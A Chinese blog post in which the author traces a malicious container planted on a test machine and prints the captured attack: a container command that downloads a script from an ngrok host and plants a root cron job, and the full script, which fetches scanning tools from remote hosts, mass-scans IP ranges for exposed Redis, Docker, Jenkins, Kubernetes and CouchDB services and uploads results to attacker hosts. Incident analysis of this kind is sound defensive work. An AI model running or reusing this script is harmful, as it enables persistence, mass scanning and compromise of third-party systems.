Docker木马问题溯源

/ Docker / 2 条评论 / 588浏览

环境

睡觉前瞄了一眼控制台,发现自己的某个测试机竟然多了个不知名的容器,CMD行为还是以curl开头的顿觉大事不妙,随后开始了一顿操作猛如虎。

容器一览

发现容器的cmd为curl,嗯,熟悉的操作,curl http://url.sh |bash 你懂得

当前cpu

一个1c的机器,load值为12,已经爆炸了,他要是个独立的物理机器,我仿佛他那飞机起飞般的声音

此时的操作终端操作已经开始卡顿了,好,登录某某云去重启(测试机器)

某某云负载监控

看下准确事发时间

大概时间在晚上9点,好,看日志是不是

日志显示在晚上8.56开始活动,执行容器任务,大概是这个时间开始植入木马的

好,冷静,看下源头

既然是由这个容器引起的,那就看下这个image

好,搜这个关键字byrnedo

镜像来源

看最后,有一个描述可能暴露出dockerfile的出处

镜像溯源

果真找到了,首页第三个仓库应该是我们的目标

dockerfile?

应该是个简单的功能镜像,在alpine的精简linux上面添加了curl命令,看到这里,可能是被借刀杀人了。

查看木马源

➜  /tmp docker ps -a --no-trunc              
CONTAINER ID                                                       IMAGE                                                                     COMMAND                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               CREATED             STATUS                           PORTS                                                                                                                      NAMES
72f11f105b8d0f9da26fd9e6f96c0108b899353ba08114e0a85fa4ddbb272152   9d899e1f01f4                                                              "/usr/bin/curl bash -c 'cat /usr/bin/curl'"                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           About an hour ago   Created                                                                                                                                                     test2
d045e3f6b708138331526794f41e790f44b47420a9ac7ebe4b156cf3acea0c6f   sha256:9d899e1f01f4d19923e8212ffa34bfbb0c21d4ee498fff0b2c2f69b9bf665265   "/bin/sh -c 'curl --retry 3 -m 60 -o /tmpcebe49/tmp/tmpfile7d3accd28246c60ffa2caa72fa1d6f42s \"http://a73d2d54.ngrok.io/z?r=7d3accd28246c60ffa2caa72fa1d6f42&i=6c6159ab8a3d434c9015c6ed5faa676d55c8b9cbf746abecdf7c3fd396bc7fa83500e110c72a66fe6cece8ccb8fe3d3c665bf3816a927ed06f49d2285c22910fe97b1432f4cf4ae7875f7cf92f0f71db87746d8167b20896d327ff909614892ab9da6d3d6cdddf3d5888faee1fe69bad\";rm -rf /tmpcebe49/etc/crontab;echo \"* * * * * root sh /tmp/tmpfile7d3accd28246c60ffa2caa72fa1d6f42s\" >/tmpcebe49/etc/cron.d/crontab;chroot /tmpcebe49 sh -c \"cron || crond\"'"   About an hour ago   Exited (137) About an hour ago                                                                                                                              gifted_colden
5ed1b95c643f487093ed92b683cbb21e5e234a4459870340b4713a56bd35525a   sha256:a829a97a04355b10ba49430104216dde7025759ffeca7ef7546aefc33fbc95eb   "docker-entrypoint.sh rabbitmq-server"                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                4 months ago        Exited (255) 12 hours ago        0.0.0.0:4369->4369/tcp, 0.0.0.0:5671-5672->5671-5672/tcp, 0.0.0.0:15671-15672->15671-15672/tcp, 0.0.0.0:25672->25672/tcp   rabbitmq

测试机器获取恶意文件

root@test:/tmp# curl --retry 3 -m 60 -o /tmp/tmpfile "http://a73d2d54.ngrok.io/z?r=7d3accd28246c60ffa2caa72fa1d6f42&i=6c6159ab8a3d434c9015c6ed5faa676d55c8b9cbf746abecdf7c3fd396bc7fa83500e110c72a66fe6cece8ccb8fe3d3c665bf3816a927ed06f49d2285c22910fe97b1432f4cf4ae7875f7cf92f0f71db87746d8167b20896d327ff909614892ab9da6d3d6cdddf3d5888faee1fe69bad"
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4778    0  4778    0     0   1720      0 --:--:--  0:00:02 --:--:--  1720
root@test:/tmp# ll
-rw-r--r--  1 root root   4778 Jun 18 23:42 tmpfile

查看恶意脚本

好些时候,这些木马脚本才是写的最好,最全面的

cat /tmp/tmpfile

OUT="/tmp/c048bdf4c8"
LOGF="/tmp/log67b0e6def1"
export PATH=/usr/sbin:$PATH

rm -rf /etc/crontab
echo '' > /etc/crontab
rm -rf /etc/cron.d/crontab
echo '' > /etc/cron.d/crontab

FINISH () {
  excode=$?
  _FILE="$OUT"
  gzip "$OUT"
  if [ -f "${_FILE}.gz" ]; then
    _FILE="${OUT}.gz"
  fi
  if [ -f "${_FILE}" ]; then
    curl -m 120 -fsk -F result=@${_FILE} "http://1d83a305.ngrok.io/z?r=7d3accd28246c60ffa2caa72fa1d6f42&i=6c6159ab8a3d434c9015c6ed5faa676d55c8b9cbf746abecdf7c3fd396bc7fa83500e110c72a66fe6cece8ccb8fe3d3c665bf3816a927ed06f49d2285c22910fe97b1432f4cf4ae7875f7cf92f0f71db87746d8167b20896d327ff909614892ab9da6d3d6cdddf3d5888faee1fe69bad&x=${excode}" >/dev/null 2>>${LOGF} || \
    curl -m 120 -fsk -F result=@${_FILE} "http://b75845c0.ngrok.io/z?r=7d3accd28246c60ffa2caa72fa1d6f42&i=6c6159ab8a3d434c9015c6ed5faa676d55c8b9cbf746abecdf7c3fd396bc7fa83500e110c72a66fe6cece8ccb8fe3d3c665bf3816a927ed06f49d2285c22910fe97b1432f4cf4ae7875f7cf92f0f71db87746d8167b20896d327ff909614892ab9da6d3d6cdddf3d5888faee1fe69bad&x=${excode}" >/dev/null 2>>${LOGF}
  fi
  rm -f "$OUT" "${OUT}.gz" "${LOGF}"
  rm -f /tmp/rinfo26be7e36

}
trap FINISH EXIT

apt-get update || yum check-update
apt-get install -y curl || yum install -y curl || apk add curl

ulimit -n 100000
rm -f "$OUT" "${OUT}.gz"

if ! type "/usr/bin/zmap" >/dev/null 2>&1 ; then
  curl -m 120 -fks -o /usr/bin/zmap "http://2f0ad09b.ngrok.io/d8/zmap"
  chmod +x /usr/bin/zmap
fi

if ! type "/usr/bin/jq" >/dev/null 2>&1 ; then
  curl -m 120 -fks -o /usr/bin/jq "http://b9b97689.ngrok.io/d8/jq"
  chmod +x /usr/bin/jq
fi

if type "zgrab" >/dev/null 2>&1 ; then
  sz=$(stat -c %s /usr/bin/zgrab)
  if [ $sz -ne 2098384 ]; then
    rm -f /usr/bin/zgrab
  fi
fi
if ! type "zgrab" >/dev/null 2>&1 ; then
  curl -m 120 -fks -o /usr/bin/zgrab "http://06c937de.ngrok.io/d8/zgrab"
  chmod +x /usr/bin/zgrab
fi

if type "zgrab" >/dev/null 2>&1 ; then
  IFACE=$(ip route | awk '/default/ {print $5}'|head -n1)
  if [ -z "${IFACE}" ]; then
    echo "Could not obtain iface:">>${LOGF}
    ip route>>${LOGF} 2>&1
    exit 1
  fi
  IPR="192.30.96.0/19 80.147.0.0/19 193.127.192.0/19 163.30.64.0/19 51.52.96.0/19 104.125.64.0/19 104.79.224.0/19 64.74.128.0/19 195.65.0.0/19 207.102.0.0/19 192.109.96.0/19 46.158.64.0/19 104.99.96.0/19 184.84.32.0/19 38.103.96.0/19 82.33.0.0/19 64.216.0.0/19 91.211.224.0/19"

  PORT="6379"
  echo -ne "info\r\nquit\r\n" >/tmp/rinfo26be7e36
  echo ";;${PORT}" > $OUT
  /usr/bin/zmap -i $IFACE -B 50M --max-sendto-failures 1000000  -c5 -o- -p $PORT $IPR 2>>${LOGF} | zgrab --senders 100 --port $PORT --data /tmp/rinfo26be7e36 --output-file=- 2>/dev/null | grep 'redis_version' | jq -r .ip >> ${OUT}

  PORT="6380"
  echo ";;${PORT}" >> $OUT
  /usr/bin/zmap -i $IFACE -B 50M --max-sendto-failures 1000000  -c5 -o- -p $PORT $IPR 2>>${LOGF} | zgrab --senders 100 --port $PORT --data /tmp/rinfo26be7e36 --output-file=- 2>/dev/null | grep 'redis_version' | jq -r .ip >> ${OUT}

  PORT="2375"
  echo ";;${PORT}" >> $OUT
  /usr/bin/zmap -i $IFACE -B 50M --max-sendto-failures 1000000  -c5 -o- -p $PORT $IPR 2>>${LOGF} | zgrab --senders 100 --port $PORT --http='/v1.16/version' --output-file=- 2>/dev/null | grep -E 'ApiVersion|client version 1.16' | jq -r .ip >> ${OUT}

  PORT="80"
  echo ";;${PORT}" >> $OUT
  /usr/bin/zmap -i $IFACE -B 50M --max-sendto-failures 1000000  -c5 -o- -p $PORT $IPR 2>>${LOGF} | zgrab --senders 100 --port $PORT --http='/' --http-max-redirects 2 --output-file=- 2>/dev/null | grep -Ei 'x_jenkins|drupal|modx|kubernetes-master|confluence' | jq -r .ip >> ${OUT}

  PORT="8080"
  echo ";;${PORT}" >> $OUT
  /usr/bin/zmap -i $IFACE -B 50M --max-sendto-failures 1000000  -c5 -o- -p $PORT $IPR 2>>${LOGF} | zgrab --senders 100 --port $PORT --http='/' --http-max-redirects 2 --output-file=- 2>/dev/null | grep -Ei 'x_jenkins|drupal|modx|kubernetes-master|confluence' | jq -r .ip >> ${OUT}

  PORT="443"
  echo ";;${PORT}" >> $OUT
  /usr/bin/zmap -i $IFACE -B 50M --max-sendto-failures 1000000  -c5 -o- -p $PORT $IPR 2>>${LOGF} | zgrab --senders 100 --port $PORT --tls --http='/' --http-max-redirects 2 --output-file=- 2>/dev/null | grep -Ei 'x_jenkins|drupal|modx|kubernetes-master|confluence' | jq -r .ip >> ${OUT}

  PORT="6443"
  echo ";;${PORT}" >> $OUT
  /usr/bin/zmap -i $IFACE -B 50M --max-sendto-failures 1000000  -c5 -o- -p $PORT $IPR 2>>${LOGF} | zgrab --senders 100 --port $PORT --tls --http='/' --http-max-redirects 2 --output-file=- 2>/dev/null | grep -Ei 'kubernetes-master' | jq -r .ip >> ${OUT}

  PORT="5984"
  echo ";;${PORT}" >> $OUT
  /usr/bin/zmap -i $IFACE -B 50M --max-sendto-failures 1000000  -c5 -o- -p $PORT $IPR 2>>${LOGF} | zgrab --senders 100 --port $PORT --http='/' --output-file=- 2>/dev/null | grep -Ei 'couchdb' | jq -r .ip >> ${OUT}

  exit $?
fi
exit 17
  1. 牛逼plus

    回复
  2. 牛逼大发

    回复